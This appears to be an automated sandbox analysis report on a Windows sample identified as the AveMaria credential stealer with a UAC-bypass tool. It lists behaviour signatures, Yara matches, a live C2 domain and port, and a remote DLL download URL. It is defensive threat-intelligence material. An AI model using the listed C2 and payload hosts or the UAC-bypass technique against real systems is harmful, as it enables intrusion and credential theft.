Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report hesaphareketi-01.exe

Overview

General Information

Sample Name:hesaphareketi-01.exe
Analysis ID:502776
MD5:38e162610466dd251d9b377a60f65c11
SHA1:2a597d5198230eaafe8d842e76776192ba3e6742
SHA256:7eb784edddde0eddd7b21c4907916f0109334a4237a9c2eb917caf8eae81480f
Tags:exegeoTUR
Infos:

Most interesting Screenshot:

Detection

AveMaria UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • hesaphareketi-01.exe (PID: 1700 cmdline: 'C:\Users\user\Desktop\hesaphareketi-01.exe' MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 6464 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 5380 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
    • hesaphareketi-01.exe (PID: 6512 cmdline: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe MD5: 38E162610466DD251D9B377A60F65C11)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "atifgabuying.ddns.net", "port": 7681}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x2c98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x5aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2c98:$c1: Elevation:Administrator!new:
  • 0x5aa0:$c1: Elevation:Administrator!new:
00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0xc98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x3aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0xc98:$c1: Elevation:Administrator!new:
    • 0x3aa0:$c1: Elevation:Administrator!new:
    00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0xc98:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x3aa0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0xc98:$c1: Elevation:Administrator!new:
      • 0x3aa0:$c1: Elevation:Administrator!new:
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x2318:$c1: Elevation:Administrator!new:
      17.3.hesaphareketi-01.exe.eca788.5.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
        17.2.hesaphareketi-01.exe.400000.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        17.2.hesaphareketi-01.exe.400000.0.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x191f0:$c1: Elevation:Administrator!new:
        Click to see the 86 entries

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "atifgabuying.ddns.net", "port": 7681}
        Multi AV Scanner detection for submitted fileShow sources
        Source: hesaphareketi-01.exeVirustotal: Detection: 31%Perma Link
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeVirustotal: Detection: 31%Perma Link
        Machine Learning detection for sampleShow sources
        Source: hesaphareketi-01.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeJoe Sandbox ML: detected
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt

        Exploits:

        barindex
        Yara detected UACMe UAC Bypass toolShow sources
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3699ae0.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375307414.0000000000EC7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375440152.0000000000EC9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375317154.0000000000EC9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 1700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 6512, type: MEMORYSTR
        Source: hesaphareketi-01.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
        Source: unknownHTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: hesaphareketi-01.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmp

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: atifgabuying.ddns.net
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: atifgabuying.ddns.net
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 31.14.69.10 31.14.69.10
        Source: global trafficTCP traffic: 192.168.2.5:49784 -> 185.66.91.154:7681
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: hesaphareketi-01.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
        Source: hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmpString found in binary or memory: https://store2.gofile.io
        Source: hesaphareketi-01.exeString found in binary or memory: https://store2.gofile.io/download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll
        Source: unknownDNS traffic detected: queries for: store2.gofile.io
        Source: global trafficHTTP traffic detected: GET /download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

        E-Banking Fraud:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000003.375572565.0000000000EB5000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372473445.00000000026B7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 17.3.hesaphareketi-01.exe.eca788.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 17.3.hesaphareketi-01.exe.eca788.5.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3699ae0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.eca788.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3659650.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 17.3.hesaphareketi-01.exe.eca788.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.eca788.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.hesaphareketi-01.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 17.3.hesaphareketi-01.exe.ec8f18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.ec4848.11.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.ec4848.10.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.26f135c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.ecbd20.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 17.3.hesaphareketi-01.exe.ecbd20.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.ec4848.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.ecbd20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 17.3.hesaphareketi-01.exe.eca788.8.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0.2.hesaphareketi-01.exe.3681670.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: hesaphareketi-01.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
        Source: 17.3.hesaphareketi-01.exe.eca788.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.3.hesaphareketi-01.exe.eca788.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3623fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.hesaphareketi-01.exe.3659650.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.3.hesaphareketi-01.exe.eca788.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
